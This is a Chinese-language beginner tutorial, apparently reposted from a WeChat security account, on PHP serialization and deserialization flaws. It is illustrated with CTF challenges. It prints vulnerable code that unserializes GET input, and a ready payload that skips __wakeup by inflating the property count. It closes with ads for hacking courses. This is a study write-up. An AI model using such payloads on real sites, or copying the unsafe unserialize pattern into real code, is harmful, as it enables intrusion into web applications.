PHP反序列化漏洞入门

admin
admin
admin
102800
文章
87
评论
2022年10月15日23:54:28评论29 views字数 1979阅读6分35秒阅读模式

零基础黑客教程,黑客圈新闻,安全面试经验

尽在 # 暗网黑客教程 #




序列化和反序列化的概念


序列化就是将一个对象转换成字符串。字符串包括 属性名 属性值 属性类型和该对象对应的类名。

反序列化则相反将字符串重新恢复成对象

对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。

ctf很多题型也都是考察PHP反序列化的相关知识



PHP的序列化


序列化函数serialize()

首先我创一个Ctf类 里面写了三个属性 后创建了一个ctfer对象 将Ctf类里的信息进行了改变。

如果后面还要用到这个对象,就可以先将这个对象进行实例化。

用的时候在反序列化出来就ok了

PHP反序列化漏洞入门

O:3:"Ctf":3{s:4:"flag";s:13:"flag{abedyui}";s:4:"name";s:7:"Sch0lar";s:3:"age";s:2:"18";}
O代表对象 因为我们序列化的是一个对象 序列化数组则用A来表示
3 代表类名字占三个字符
ctf 类名
3 代表三个属性
s代表字符串
4代表属性名长度
flag属性名
s:13:"flag{abedyui}" 字符串 属性值长度 属性值

serialize() 函数会检查类中是否存在一个魔术方法 __sleep()。

如果存在,__sleep()方法会先被调用,然后才执行序列化操作。

可以再__sleep()方法里可以决定哪些属性被序列化

如果没有__sleep()方法则默认序列化所有属性

PHP反序列化漏洞入门


上图__sleep()方法使flag age 属性序列化 name并没有被序列化


访问控制修饰符


根据访问控制修饰符的不同 序列化后的 属性长度和属性值会有所不同,所以这里简单提一下

public(公有)
protected(受保护)
private(私有的)

protected属性被序列化的时候属性值会变成%00*%00属性名

private属性被序列化的时候属性值会变成%00类名%00属性名

可能有点难理解 这里我敲一下大家就懂了

PHP反序列化漏洞入门

O:3:"Ctf":3:{s:4:"name";s:7:"Sch0lar";s:6:"*age";s:2:"19";s:9:"Ctfflag";s:8:"get flag";}

可以看到

s:6:"*age" //*前后出现了两个%00也就是空白符 一个%00长度为一 所以序列化后 该属性长度为6
s:9:"Ctfflag" //ctf前后也就是类名前后出现两个%00 所以长度为9



PHP的反序列化


反序列化函数unserialize()

反序列化就是将一个序列化的字符串,还原回去

PHP反序列化漏洞入门

与 序列化函数类似 unserialize() 会检查是否存在一个 __wakeup()魔术方法

如果存在则会先调用__wakeup()方法在进行反序列化

可以再__wakeup()方法中对属性进行初始化或者改变。

PHP反序列化漏洞入门

反序列化之前重新给flag属性赋值

当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。

这个大家应该都知道很常见的姿势了。为了直观一点找了些考察反序列化的ctf。



ctf


PHP反序列化漏洞入门

首先我们本地进行序列化后得到字符串

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

PHP反序列化漏洞入门

把1写成2 达到绕过wakeup()效果 拿到flag

PHP反序列化漏洞入门

找到一个 比较能总结这篇文章的题

PHP反序列化漏洞入门

看到良好的备份网站习惯

url上直接/www.zip下载了网站源码

index.php里发现核心代码

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
?>

读了class.php 发现需要 username=admin 并且 password=100才可以 还有一段核心代码

function __wakeup(){
        $this->username = 'guest';
}

PHP反序列化漏洞入门

我们本地进行实例化 序列化

$a = new Name('admin',100);
$b = serialize($a);
print_r($b);

得到序列化后的字符串为

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

代码中存在 __wakeup前面说过。

当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。

还有因为我们要通过get方式进行提交 所以%00也必须写在url上

最终payload为

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

PHP反序列化漏洞入门





黑客教程~ 课件 靶场 ~ 限!时!免费!送!

长按识别二维码,即可限时免费报名课程。


PHP反序列化漏洞入门



点击在看~好文大家给一起看!👇



原文始发于微信公众号(白帽子左一):PHP反序列化漏洞入门

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月15日23:54:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHP反序列化漏洞入门http://cn-sec.com/archives/957347.html

发表评论

匿名网友 填写信息